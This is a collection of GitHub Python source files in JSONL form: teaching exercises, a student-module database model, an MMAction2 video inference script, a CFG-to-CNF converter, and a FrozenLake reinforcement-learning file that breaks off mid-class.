+{"seq_id":"2621740368","text":"\"\"\"\nInstance bound proxy:\nsuper(class, instance-of-class)\n\nFinds the MRO of second argument.\nFinds the location of the first argument in the MRO\nUses everything after that for resolving methods\n\"\"\"\nfrom training.ObjectOriented.Inheritance_and_Subtype_Polymorphism.sorted_list import *\n\nsil = SortedIntlist([5, 15, 10])\nsuper(SortedList, sil)\nsuper(SortedList, sil).add(6)\n\n\n","repo_name":"Jon-J/python_repo","sub_path":"training/ObjectOriented/Inheritance_and_Subtype_Polymorphism/09super_instance_bound_proxy.py","file_name":"09super_instance_bound_proxy.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"36460716596","text":"from core import Database\n\nclass StudentModule:\n\n # Static methods which retrieve data from the database.\n @staticmethod\n def findById(id):\n rows = Database.getRows('SELECT * FROM `StudentModule` WHERE `id` = %s', (id,))\n\n if len(rows) == 0:\n return None\n \n studentModule = StudentModule()\n studentModule.setId(rows[0]['id'])\n studentModule.setModule(rows[0]['module'])\n studentModule.setStudent(rows[0]['student'])\n studentModule.setEnrolmentDate(rows[0]['enrolment_date'])\n\n return studentModule\n \n @staticmethod\n def all():\n rows = Database.getRows('SELECT * FROM `StudentModule`')\n\n out = []\n\n for i in rows:\n studentModule = StudentModule()\n studentModule.setId(i['id'])\n studentModule.setModule(i['module'])\n studentModule.setStudent(i['student'])\n studentModule.setEnrolmentDate(i['enrolment_date'])\n out.append(studentModule)\n\n return out\n\n @staticmethod\n def findBy(field, value):\n rows = Database.getRows('SELECT * FROM `StudentModule` WHERE ' + field +' = %s', (value,))\n\n out = []\n\n for i in rows:\n studentModule = StudentModule()\n studentModule.setId(i['id'])\n studentModule.setModule(i['module'])\n studentModule.setStudent(i['student'])\n studentModule.setEnrolmentDate(i['enrolment_date'])\n out.append(studentModule)\n\n return out\n\n # Class Methods\n def __init__(self):\n self.id = None\n self.row = {}\n\n return\n \n def save(self):\n if self.id == None:\n # insert\n Database.execute('INSERT INTO `StudentModule` (`module`,`student`, `enrolment_date`) VALUES (%s, %s, %s)', (self.row['module'],self.row['student'], self.row['enrolment_date']))\n\n rows = Database.getRows('SELECT LAST_INSERT_ID() AS insert_id')\n self.id = rows[0]['insert_id']\n else:\n # update\n Database.execute('UPDATE `StudentModule` SET `module` = %s ,`student` = %s, `enrolment_date` = %s WHERE `id` = %s', (self.row['module'],self.row['student'], self.row['enrolment_date'], self.id))\n \n def delete(self):\n if self.id == None:\n return\n\n Database.execute('DELETE FROM `StudentModule` WHERE `id` = %s', (self.id,)) \n\n # Methods for dealing with properties (setters and getters).\n \n def setId(self, id):\n self.id = id\n return self\n def getId(self):\n return self.id\n\n\n def setModule(self, module):\n self.row['module'] = module\n return self\n def getModule(self):\n return self.row['module']\n\n\n def setStudent(self, student):\n self.row['student'] = student\n return self\n def getStudent(self):\n return self.row['student']\n\n def setEnrolmentDate(self, enrolment_date):\n self.row['enrolment_date'] = enrolment_date\n return self\n def getEnrolmentDate(self):\n return self.row['enrolment_date']","repo_name":"Mwall93/A4_Scheduler","sub_path":"model/StudentModule.py","file_name":"StudentModule.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"37915177986","text":"# 将两个有序链表合并为一个新的有序链表并返回。新链表是通过拼接给定的两个链表的所有节点组成的。\n#\n# 示例:\n#\n# 输入:1->2->4, 1->3->4\n# 输出:1->1->2->3->4->4\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\ndef getList(l):\n def getNext(lLeft):\n if lLeft:\n currentNode = ListNode(lLeft[0])\n currentNode.next = getNext(lLeft[1:])\n return currentNode\n\n headNode = getNext(l)\n return headNode\n\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n # if l1 is None:\n # return l2\n # elif l2 is None:\n # return l1\n # else:\n # if l2.val < l1.val:\n # l1, l2 = l2, l1\n # currentNode = l1\n # while currentNode and l2:\n # while currentNode.next and currentNode.next.val < l2.val:\n # currentNode = currentNode.next\n # currentNode.next, l2 = l2, currentNode.next\n # if currentNode.next:\n # currentNode = currentNode.next\n # return l1\n if l1 is None:\n return l2\n elif l2 is None:\n return l1\n elif l1.val < l2.val:\n l1.next = self.mergeTwoLists(l1.next, l2)\n return l1\n else:\n l2.next = self.mergeTwoLists(l1, l2.next)\n return l2\n\n pass\n\n\ns = Solution()\nl1 = getList([1, 2, 3])\nl2 = getList([1, 3, 4])\nnodeMerged = s.mergeTwoLists(l1, l2)\nwhile nodeMerged:\n print(nodeMerged.val)\n nodeMerged = nodeMerged.next\nl1 = getList([-9, 3])\nl2 = getList([5, 7])\nnodeMerged = s.mergeTwoLists(l1, l2)\nwhile nodeMerged:\n print(nodeMerged.val)\n nodeMerged = nodeMerged.next\n","repo_name":"vzpd/myBrushRecord","sub_path":"exercise/bd_合并两个有序链表.py","file_name":"bd_合并两个有序链表.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"31069033930","text":"import codecs\nimport os\n\nremotes_folder = \"../lirc-remotes-code/remotes/\"\n\n\ndef get_name(manufacturer: str, conf_file: str) -> str:\n file_path = remotes_folder + manufacturer + \"/\" + conf_file\n\n with codecs.open(file_path, mode=\"r\", encoding=\"utf8\", errors=\"ignore\") as file:\n for each_line in file:\n stripped = each_line.strip()\n if stripped.startswith(\"begin remote\"):\n break\n\n for each_line in file:\n stripped = each_line.strip()\n if stripped.startswith(\"name\"):\n name = stripped[4:].strip()\n return name.replace(\"_\", \" \")\n\n return conf_file\n\n\ndef main():\n\n directories = tuple(\n _x\n for _x in os.listdir(remotes_folder)\n if os.path.isdir(remotes_folder + _x)\n )\n\n conf_files = {\n _d: tuple(\n _c\n for _c in os.listdir(remotes_folder + _d)\n if os.path.isfile(remotes_folder + _d + \"/\" + _c) and _c.endswith(\".conf\")\n )\n for _d in directories\n }\n\n for k, values in conf_files.items():\n for v in values:\n print(\"{:s}, {:s}: {:s}\".format(k, v, get_name(k, v)))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wehnsdaefflae/PythonTurntable","sub_path":"get_conf.py","file_name":"get_conf.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"17244228071","text":"import torch\nimport os\nfrom torch.utils.data import Dataset\n\nfrom torch.distributed import get_rank\nfrom utils import print_rank\nfrom tqdm import tqdm\nimport json\n\n\nclass PromptDataset(Dataset):\n def __init__(self, args, tokenizer, data_path, num=-1):\n super().__init__()\n self.tokenizer = tokenizer\n self.args = args\n self.pad_id = self.tokenizer.eos_token_id\n self.max_prompt_length = args.max_prompt_length\n\n self.data = self.load_data_json(data_path)\n \n if num > 0:\n self.data = self.data[:num]\n \n self.num = min(num, len(self.data)) if num > 0 else len(self.data)\n print_rank(f\"Num instances: {len(self.data)}\")\n \n def __len__(self):\n return self.num\n\n def load_data_json(self, data_path):\n if os.path.exists(os.path.join(data_path, f\"{self.args.data_name}.jsonl\")):\n data_path = os.path.join(data_path, f\"{self.args.data_name}.jsonl\")\n else:\n print_rank(f\"WARNING: {os.path.join(data_path, f'{self.args.data_name}.jsonl')} does not exist\")\n\n with open(data_path) as f:\n lines = f.readlines()\n data_origin = [json.loads(line) for line in lines]\n data = []\n for d in tqdm(data_origin, disable=(get_rank() != 0), desc=\"Loading data\"):\n data.append({\n \"prompt\": d[\"prompt\"].replace(\"\", \"\\n\"),\n \"output\": d[\"output\"]\n })\n return data\n\n def __getitem__(self, index: int):\n data = self.data[index]\n\n output = data[\"output\"]\n prompt = data[\"prompt\"]\n \n return index, prompt, output\n \n def collate(self, samples): \n prompt_batch = [sample[1] for sample in samples]\n prompt_ids = self.tokenizer.batch_encode_plus(prompt_batch, \n return_tensors=\"pt\", \n max_length=self.max_prompt_length, \n truncation=True, \n padding='max_length',\n return_token_type_ids=False,)\n \n answer_batch = [sample[2] for sample in samples]\n indices = [sample[0] for sample in samples]\n \n return indices, prompt_ids, answer_batch\n\n def move_to_device(self, prompt_ids, device):\n for t in prompt_ids:\n if torch.is_tensor(prompt_ids[t]):\n prompt_ids[t] = prompt_ids[t].to(device)","repo_name":"yining610/in-context-generalization","sub_path":"data_utils/prompt_datasets.py","file_name":"prompt_datasets.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"21472749270","text":"from dataclasses import dataclass, field\nfrom src.interfaces.singleton import Singleton\n\n@dataclass\nclass EnumerationReporte(metaclass=Singleton):\n \"\"\"Cache results to use in real time execution\n \"\"\"\n \n report_subdomains: list = field(init=False, default_factory=list)\n \n def add(self, subdomain) -> None:\n self.report_subdomains.extend(subdomain)","repo_name":"deidax/dosuby","sub_path":"src/core/domain/enumeration_reporte.py","file_name":"enumeration_reporte.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"7462314759","text":"import argparse\nimport random\nimport collections\nimport itertools\nfrom collections import deque\nfrom operator import itemgetter\nimport os\nimport cv2\nimport mmcv\nimport numpy as np\nimport torch\nimport json\nfrom mmcv.parallel import collate, scatter\n\nfrom mmaction.apis import init_recognizer\nfrom mmaction.datasets.pipelines import Compose\nfrom mmaction.core import OutputHook\nfrom SoccerNet.utils import getListGames\nfrom SoccerNet.DataLoader import Frame, FrameCV\n\nFONTFACE = cv2.FONT_HERSHEY_COMPLEX_SMALL\nFONTSCALE = 1\nFONTCOLOR = (255, 255, 255) # BGR, white\nMSGCOLOR = (128, 128, 128) # BGR, gray\nTHICKNESS = 1\nLINETYPE = 1\n\nEXCLUED_STEPS = [\n 'OpenCVInit', 'OpenCVDecode', 'DecordInit', 'DecordDecode', 'PyAVInit',\n 'PyAVDecode', 'RawFrameDecode', 'FrameSelector'\n]\n\nclass sliceable_deque(collections.deque):\n def __getitem__(self, index):\n if isinstance(index, slice):\n return type(self)(itertools.islice(self, index.start,\n index.stop, index.step))\n return collections.deque.__getitem__(self, index)\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='MMAction2 predict different labels in a long video demo')\n parser.add_argument('config', help='test config file path')\n parser.add_argument('checkpoint', help='checkpoint file/url')\n parser.add_argument(\n '--device', type=str, default='cuda:0', help='CPU/CUDA device option')\n parser.add_argument(\n '--split',\n type=str,\n default=\"val\",\n help='val/test')\n parser.add_argument(\n '--bias',\n type=int,\n default=1000,\n help='classify temporal bias')\n parser.add_argument(\n '--half',\n type=int,\n default=0,\n help='0: 1st part, 1: second part, 2:third part, 3:forth part') # 4 parts\n\n parser.add_argument(\n '--datapath',\n type=str,\n default=\"data/loveu_wide_val_2s_30fps/\",\n help='loveu val data path')\n parser.add_argument(\n '--targetpath',\n type=str,\n default=\"data/valres/\",\n help='target path')\n parser.add_argument(\n '--modelname',\n type=str,\n default=\"csn_4cls_2s_30fps\",\n help='pth model name')\n parser.add_argument(\n '--fps',\n type=float,\n default=30.0,\n help=('fps'))\n parser.add_argument(\n '--stride',\n type=int,\n default=8,\n help='stride')\n args = parser.parse_args()\n return args\n\ndef bmn_proposals(results,\n num_videos,\n max_avg_proposals=None,\n num_res = 1,\n thres=0.0,\n ):\n\n bmn_res = []\n for result in results:\n #video_id = result['video_name']\n num_proposals = 0\n cur_video_proposals = []\n for proposal in result:\n t_start, t_end = proposal['segment']\n score = proposal['score']\n if score < thres: continue\n cur_video_proposals.append([t_start, t_end, score])\n num_proposals += 1\n if len(cur_video_proposals)==0: \n bmn_res.append(np.array([-2021]))\n continue\n cur_video_proposals = np.array(cur_video_proposals)\n\n ratio = (max_avg_proposals * float(num_videos) / num_proposals)\n\n this_video_proposals = cur_video_proposals[:, :2]\n sort_idx = cur_video_proposals[:, 2].argsort()[::-1]\n this_video_proposals = this_video_proposals[sort_idx, :].astype(np.float32)\n\n if this_video_proposals.ndim != 2:\n this_video_proposals = np.expand_dims(this_video_proposals, axis=0)\n\n # For each video, compute temporal_iou scores among the retrieved proposals\n total_num_retrieved_proposals = 0\n # Sort proposals by score\n num_retrieved_proposals = np.minimum(\n int(this_video_proposals.shape[0] * ratio),\n this_video_proposals.shape[0])\n total_num_retrieved_proposals += num_retrieved_proposals\n 
this_video_proposals = this_video_proposals[:num_retrieved_proposals, :]\n \n #print(this_video_proposals)\n this_video_gebd_proposals = this_video_proposals.mean(axis=-1)\n num_res = min(num_res, len(this_video_gebd_proposals))\n this_video_gebd_top_proposal = this_video_gebd_proposals[:num_res]\n\n bmn_res.append(this_video_gebd_top_proposal)\n return bmn_res\n\n\ndef show_results(model, data, test, cn, args):\n frame_queue = sliceable_deque(maxlen=args.sample_length)\n result_queue = deque(maxlen=1)\n result_path = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_score.npy\"\n # save results with different scores\n result_bmn_path = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal.npy\"\n\n result_bmn_path_3 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.3.npy\"\n result_bmn_path_4 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.4.npy\"\n result_bmn_path_5 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.5.npy\"\n result_bmn_path_6 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.6.npy\"\n result_bmn_path_7 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.7.npy\"\n result_bmn_path_8 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.8.npy\"\n result_bmn_path_9 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.9.npy\"\n result_bmn_path_95 = args.targetpath + test.split(\".\")[0] + \"/\" + args.modelname + \"_proposal_0.95.npy\"\n\n videoLoader = FrameCV(args.datapath + '/' + test, FPS=args.fps, transform=\"resize256\", start=None, duration=None)\n frames = videoLoader.frames[:, :, :, ::-1]\n print(cn, test, frames.shape)\n\n duration = videoLoader.time_second\n\n stride = args.stride\n pad_length = int(args.sample_length/2)\n frames_head = np.zeros((pad_length, frames.shape[1], frames.shape[2], frames.shape[3]), frames.dtype)\n frames_tail = np.zeros((pad_length, frames.shape[1], frames.shape[2], frames.shape[3]), frames.dtype)\n for i in range(pad_length):\n frames_head[i] = frames[0].copy()\n frames_tail[i] = frames[-1].copy()\n frames_padded = np.concatenate((frames_head, frames, frames_tail), 0)\n\n score_list = []\n bmn_results = []\n num_sub_videos = 0\n for i in range(int(frames.shape[0]/stride)):\n num_sub_videos += 1\n start_index = i * stride\n frame_queue = frames_padded[(start_index):(start_index + args.sample_length)][0::data['frame_interval']].copy()\n ret, scores, output_bmn = inference(model, data, args, frame_queue)\n score_list.append(scores)\n bmn_results.append(output_bmn)\n bmn_res = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.0,\n )\n\n score_list = np.array(score_list)\n bmn_res = np.array(bmn_res)\n\n bmn_res3 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.3,\n )\n bmn_res3 = np.array(bmn_res3)\n\n bmn_res4 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.4,\n )\n bmn_res4 = np.array(bmn_res4)\n\n bmn_res5 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.5,\n )\n bmn_res5 = np.array(bmn_res5)\n\n bmn_res6 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.6,\n )\n bmn_res6 = np.array(bmn_res6)\n\n bmn_res7 = bmn_proposals(bmn_results,\n num_videos=1,\n 
max_avg_proposals=100,\n num_res = 10,\n thres=0.7,\n )\n bmn_res7 = np.array(bmn_res7)\n\n bmn_res8 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.8,\n )\n bmn_res8 = np.array(bmn_res8)\n\n bmn_res9 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.9,\n )\n bmn_res9 = np.array(bmn_res9)\n\n bmn_res95 = bmn_proposals(bmn_results,\n num_videos=1,\n max_avg_proposals=100,\n num_res = 10,\n thres=0.95,\n )\n bmn_res95 = np.array(bmn_res95)\n\n score_list = np.array(score_list)\n bmn_res = np.array(bmn_res)\n #print(cn, test, frames.shape, score_list.shape)\n np.save(result_path, score_list)\n np.save(result_bmn_path, bmn_res)\n np.save(result_bmn_path_3, bmn_res3)\n np.save(result_bmn_path_4, bmn_res4)\n np.save(result_bmn_path_5, bmn_res5)\n np.save(result_bmn_path_6, bmn_res6)\n np.save(result_bmn_path_7, bmn_res7)\n np.save(result_bmn_path_8, bmn_res8)\n np.save(result_bmn_path_9, bmn_res9)\n np.save(result_bmn_path_95, bmn_res95)\n print(cn, result_path, \"saved\")\n\ndef inference(model, data, args, frame_queue):\n cur_windows = list(frame_queue)\n if data['img_shape'] is None:\n data['img_shape'] = frame_queue[0].shape[:2]\n cur_data = data.copy()\n cur_data['imgs'] = cur_windows\n cur_data = args.test_pipeline(cur_data)\n cur_data = collate([cur_data], samples_per_gpu=1)\n if next(model.parameters()).is_cuda:\n cur_data = scatter(cur_data, [args.device])[0]\n with torch.no_grad():\n scores, output_bmn = model(return_loss=False, **cur_data)\n return True, scores[0], output_bmn[0]\n\ndef main():\n args = parse_args()\n\n args.device = torch.device(args.device)\n model = init_recognizer(args.config, args.checkpoint, device=args.device)\n data = dict(img_shape=None, modality='RGB', label=-1)\n\n # prepare test pipeline from non-camera pipeline\n cfg = model.cfg\n sample_length = 0\n pipeline = cfg.test_pipeline\n pipeline_ = pipeline.copy()\n for step in pipeline:\n if 'SampleFrames' in step['type']:\n sample_length = step['clip_len'] * step['frame_interval']\n data['frame_interval'] = step['frame_interval']\n data['num_clips'] = step['num_clips']\n data['clip_len'] = step['clip_len']\n pipeline_.remove(step)\n if step['type'] in EXCLUED_STEPS:\n # remove step to decode frames\n pipeline_.remove(step)\n test_pipeline = Compose(pipeline_)\n\n assert sample_length > 0\n args.sample_length = sample_length\n args.test_pipeline = test_pipeline\n\n tests = []\n videos = os.listdir(args.datapath)\n for video in videos:\n video_path = video\n tests.append(video_path)\n\n num_split = 4\n if args.stride == 2:\n num_split = 16\n if args.stride == 4:\n num_split = 6\n if args.stride == 8:\n num_split = 8\n if args.stride == 16:\n num_split = 16\n\n quater_len = int(len(tests)/num_split)\n\n if args.half != num_split-1:\n tests = tests[(args.half*quater_len):((args.half+1)*quater_len)]\n else:\n tests = tests[(args.half*quater_len):]\n\n cn = 0\n for test in tests:\n cn += 1\n if not os.path.exists(args.targetpath + test.split(\".\")[0]):\n os.makedirs(args.targetpath + test.split(\".\")[0], exist_ok=True)\n show_results(model, data, test, cn, args)\n \nif __name__ == '__main__':\n main()\n\n","repo_name":"VisualAnalysisOfHumans/LOVEU_TRACK1_TOP3_SUBMISSION","sub_path":"Track1.2/inference/long_video_demo_extractor_bmn.py","file_name":"long_video_demo_extractor_bmn.py","file_ext":"py","file_size_in_byte":12359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
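The `bmn_proposals` helper in the record above keeps the top-scoring fraction of BMN segment proposals and collapses each kept `[t_start, t_end]` pair into its midpoint as a boundary estimate. A standalone sketch of that core step in plain numpy (function and variable names are mine):

import numpy as np

def top_boundaries(proposals, num_res=10, thres=0.0):
    # Keep proposals scoring at or above `thres`, rank by score, and return
    # the midpoints of the best `num_res` segments as boundary estimates.
    kept = np.array([[s, e, sc] for s, e, sc in proposals if sc >= thres])
    if kept.size == 0:
        return np.array([])                    # no boundary found
    order = kept[:, 2].argsort()[::-1]         # highest score first
    segments = kept[order, :2][:num_res]       # top-k [start, end] pairs
    return segments.mean(axis=-1)              # midpoint of each segment

print(top_boundaries([(0.0, 2.0, 0.9), (3.0, 5.0, 0.4)], num_res=2, thres=0.3))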
+{"seq_id":"31055990121","text":"from os import close\nfrom copy import deepcopy\nimport sys\n\nglobal cfg\ncfg = {}\ncnf = {}\nLHS = []\nRHS = []\nEPS = []\nVAR = 'FX'\nglobal count\ncount = 0\nglobal panggil\npanggil = False\n\ndef readCFG(filename):\n with open(filename) as file:\n lines = file.readlines()\n lines = [line.strip() for line in lines]\n file.close()\n for line in lines:\n if(line == \"\"):\n pass\n else:\n a,b = line.split('->')\n a = a.strip()\n b = b.strip().split('|')\n LHS.append(a)\n RHS.append(b)\n for i in range(len(b)):\n b[i] = b[i].split()\n cfg[a] = b\n#MEMBACA CFG LALU MENYIMPANNYA DI DICTIONARY DENGAN FORMAT:\n#{LHS : [[RHS]]}\n#CONTOH : \n#{'S' : [['ACTION','VAR'],['OPS','VALUE']]}\n\ndef retCFG():\n return cfg\n\ndef retCNF():\n return cnf\n\ndef retEPS():\n return EPS\n\ndef STARTSTATE(): #MENAMBAH START STATE DI AWAL\n global panggil\n if(isCalledinRHS(LHS[0])):\n cnf[\"S0\"] = [[LHS[0]]]\n LHS.insert(0,\"S0\")\n RHS.insert(0,[[LHS[1]]])\n panggil = True\n else:\n LHS[0] = \"S0\"\n assignNewdict()\n cnf.update(cfg)\n\ndef uselessRemovalSTATE():\n bal = 0 #AGAR INDEX TETAP VALID SETELAH PENGHAPUSAN SUATU ELEMEN\n for i in range(len(LHS)): #MENGHILANGKAN NON TERMINAL YANG TIDAK PERNAH TERCAPAI\n if(not isCalledinRHS(LHS[i-bal]) and LHS[i-bal] != LHS[0]):\n delCont = cnf[LHS[i-bal]]\n del cnf[LHS[i-bal]]\n LHS.remove(LHS[i-bal])\n RHS.remove(delCont)\n bal += 1\n \n #MENGHILANGKAN UNIT PRODUCTION\n for i in range(len(LHS)):\n right = cnf[LHS[i]]\n n = len(right)\n j=0\n while(j1):\n for k in j:\n if(k not in LHS): \n singleVar = containSingleTerminal(k)\n if(singleVar == ''):\n new = VAR + str(count)\n cnf[new] = [[k]]\n k = new\n LHS.append(new)\n RHS.append(cnf[new])\n updateRHS(LHS[i],j,cnf[new][0][0],new)\n count += 1\n else:\n updateRHS(LHS[i],j,k,singleVar)\n assignNewdict()\n \n\n \ndef subMoreThan2():\n global count\n idx = 0\n for i in cnf:\n right = cnf[i]\n for j in range(len(right)):\n if(len(right[j])>2): #KALO ADA YANG LEBIH DARI 2 VAR BUAT SATU RULE BAKAL DISUBSTITUSI\n k = 0\n balance = 0\n while(len(right[j])>2): #BAKAL DILAKUIN SEBANYAK VARIABLE DIV 2\n tmp = []\n #print(RHS[idx][j],k)\n tmp.append(right[j][k-balance])\n tmp.append(right[j][k+1-balance])\n if(not isExistInRHS(tmp)):\n RHS.append([[right[j][k-balance]]])\n panj = len(RHS)\n RHS[panj-1][0].append(right[j][k+1-balance])\n newVar = VAR + str(count) \n right[j].remove(right[j][k+1-balance])\n right[j].remove(right[j][k-balance])\n right[j].insert(k-balance,newVar)\n LHS.append(newVar)\n RHS[idx][j] = right[j]\n count += 1\n else:\n right[j].remove(right[j][k+1-balance])\n right[j].remove(right[j][k-balance])\n tmp2 = retLHSFromRHS(tmp)\n right[j].insert(k-balance,tmp2)\n k += 1\n balance += 1\n #print(RHS[idx][j])\n \n idx+=1\n assignNewdict()\n \ndef isExistInRHS(right):\n for i in RHS:\n if (len(i) == 1 and right in i):\n return True\n return False\n\ndef retLHSFromRHS(right):\n for i in range(len(RHS)):\n if (len(RHS[i]) == 1 and right in RHS[i]):\n return LHS[i]\n return None\ndef isCallingItself(left):\n right = cnf[left]\n for i in right:\n if(len(i) == 1 and i[0] == left):\n return True\n else:\n return False\n\ndef isCalledinRHS(left):\n for i in RHS:\n for j in i:\n if (left in j):\n return True\n return False\n\ndef isSoloProduced(left):\n right = cnf[left]\n if (len(right)>1):\n return False\n else:\n return True\n\n\n#FUNGSI TAMBAHAN YANG DIPERLUKAN UNTUK MENCARI TERMINAL DAN VARIABEL YANG BERSEBELAHAN\ndef isContainLHS(arr):\n for i in arr:\n if(i in LHS):\n return 
True\n return False\n\ndef isContainRHS(arr):\n for i in arr:\n if(i not in LHS):\n return True\n return False\n\n#MENGHAPUS VALUE PADA LHS DAN RHS\ndef delRandL(string):\n found = False\n i = 0\n while(not found):\n if(LHS[i] == string):\n found = True\n delCont = cnf[LHS[i]]\n LHS.remove(LHS[i])\n RHS.remove(delCont)\n else:\n i += 1\n\ndef updateRHS(left,right,val,val2):\n found = False\n i = 0\n while(not found):\n if(LHS[i] == left):\n count = 0\n for j in RHS[i]:\n if (j == right):\n count2 = 0\n for k in j:\n if(k==val):\n RHS[i][count][count2] = val2\n count2 += 1\n found = True\n count += 1\n i += 1\n\ndef containSingleTerminal(X):\n for i in cnf:\n right = cnf[i]\n for j in right:\n if(len(j)==1 and j[0] == X and len(right) == 1):\n return i\n return ''\n\ndef assignNewdict():\n cnf.clear()\n for i in range(len(LHS)):\n cnf[LHS[i]] = RHS[i]\n\ndef writeToFile():\n write = ''\n for i in range(len(LHS)):\n write += LHS[i] + ' -> '\n for j in range(len(RHS[i])):\n for k in range(len(RHS[i][j])):\n write += ' '+ RHS[i][j][k] + ' '\n if(j != len(RHS[i])-1):\n write += \"|\"\n write += \"\\n\"\n f = open(\"cnf_out.txt\",\"w\")\n f.write(write)\n f.close()\n\ndef printCNF():\n write = ''\n for i in range(len(LHS)):\n write += LHS[i] + ' -> '\n for j in range(len(RHS[i])):\n for k in range(len(RHS[i][j])):\n write += ' '+ RHS[i][j][k] + ' '\n if(j != len(RHS[i])-1):\n write += \"|\"\n write += \"\\n\"\n print(write)\n\nif(__name__ == '__main__'):\n if(len(sys.argv)>1):\n try:\n readCFG(sys.argv[1])\n except:\n print(\"File Tidak ditemukan!\")\n sys.exit()\n STARTSTATE()\n uselessRemovalSTATE()\n eliminateTerminal()\n subMoreThan2()\n writeToFile()\n print(\"CFG telah berhasil diconvert ke CNF!\")","repo_name":"IMYELI/Tubes-TBFO-Python-Syntax-Evaluation","sub_path":"cfgConv.py","file_name":"cfgConv.py","file_ext":"py","file_size_in_byte":9005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
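`subMoreThan2` in the converter above binarizes any production with more than two symbols by introducing fresh `FX<n>` variables. A self-contained sketch of that step over the same `{LHS: [[RHS symbols]]}` dictionary shape (simplified: unlike the script, it does not reuse an existing variable when the same pair already has one):

def binarize(grammar, prefix='FX'):
    # A -> B C D becomes A -> B FX0 and FX0 -> C D.
    count = 0
    out = {}
    for lhs, alternatives in grammar.items():
        out.setdefault(lhs, [])
        for rhs in alternatives:
            rhs = list(rhs)
            while len(rhs) > 2:
                new = prefix + str(count)
                count += 1
                out[new] = [rhs[-2:]]      # fresh variable derives the last pair
                rhs = rhs[:-2] + [new]
            out[lhs].append(rhs)
    return out

print(binarize({'S': [['A', 'B', 'C', 'D']]}))
# {'S': [['A', 'FX1']], 'FX0': [['C', 'D']], 'FX1': [['B', 'FX0']]}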
+{"seq_id":"6204753212","text":"import os\nimport argparse\nimport numpy as np\nfrom collections import defaultdict\nfrom sklearn.externals import joblib\nfrom sklearn.neural_network import MLPRegressor\nimport tensorflow as tf\nimport tensorflow.contrib.eager as tfe\nfrom tensorflow.python import keras as K\nimport gym\nfrom gym.envs.registration import register\nregister(id=\"FrozenLakeEasy-v0\", entry_point=\"gym.envs.toy_text:FrozenLakeEnv\",\n kwargs={\"is_slippery\": False})\n\n\ntfe.enable_eager_execution()\n\n\nclass TeacherAgent():\n\n def __init__(self, env, epsilon=0.1):\n self.actions = list(range(env.action_space.n))\n self.num_states = env.observation_space.n\n self.epsilon = epsilon\n self.model = None\n\n def save(self, model_path):\n joblib.dump(self.model, model_path)\n\n @classmethod\n def load(cls, env, model_path, epsilon=0.1):\n agent = cls(env, epsilon)\n agent.model = joblib.load(model_path)\n return agent\n\n def initialize(self, state):\n # Only state => action projection is needed\n self.model = MLPRegressor(hidden_layer_sizes=(), max_iter=1)\n # Warmup to use predict method\n dummy_label = [np.random.uniform(size=len(self.actions))]\n self.model.partial_fit(np.array([self.transform(state)]),\n np.array(dummy_label))\n return self\n\n def estimate(self, state):\n feature = self.transform(state)\n q = self.model.predict([feature])[0]\n return q\n\n def policy(self, state):\n if np.random.random() < self.epsilon:\n return np.random.randint(len(self.actions))\n else:\n return np.argmax(self.estimate(state))\n\n def transform(self, state):\n feature = np.zeros(self.num_states)\n feature[state] = 1.0\n return feature\n\n @classmethod\n def train(cls, env, episode_count=3000, gamma=0.9,\n initial_epsilon=1.0, final_epsilon=0.1, report_interval=100):\n agent = cls(env, initial_epsilon).initialize(env.reset())\n rewards = []\n decay = (initial_epsilon - final_epsilon) / episode_count\n for e in range(episode_count):\n s = env.reset()\n done = False\n goal_reward = 0\n while not done:\n a = agent.policy(s)\n estimated = agent.estimate(s)\n\n n_state, reward, done, info = env.step(a)\n\n gain = reward + gamma * max(agent.estimate(n_state))\n estimated[a] = gain\n agent.model.partial_fit([agent.transform(s)], [estimated])\n s = n_state\n else:\n goal_reward = reward\n\n rewards.append(goal_reward)\n if e != 0 and e % report_interval == 0:\n recent = np.array(rewards[-report_interval:])\n print(\"At episode {}, reward is {}\".format(\n e, recent.mean()))\n agent.epsilon -= decay\n\n return agent\n\n\nclass IRL():\n\n def __init__(self, 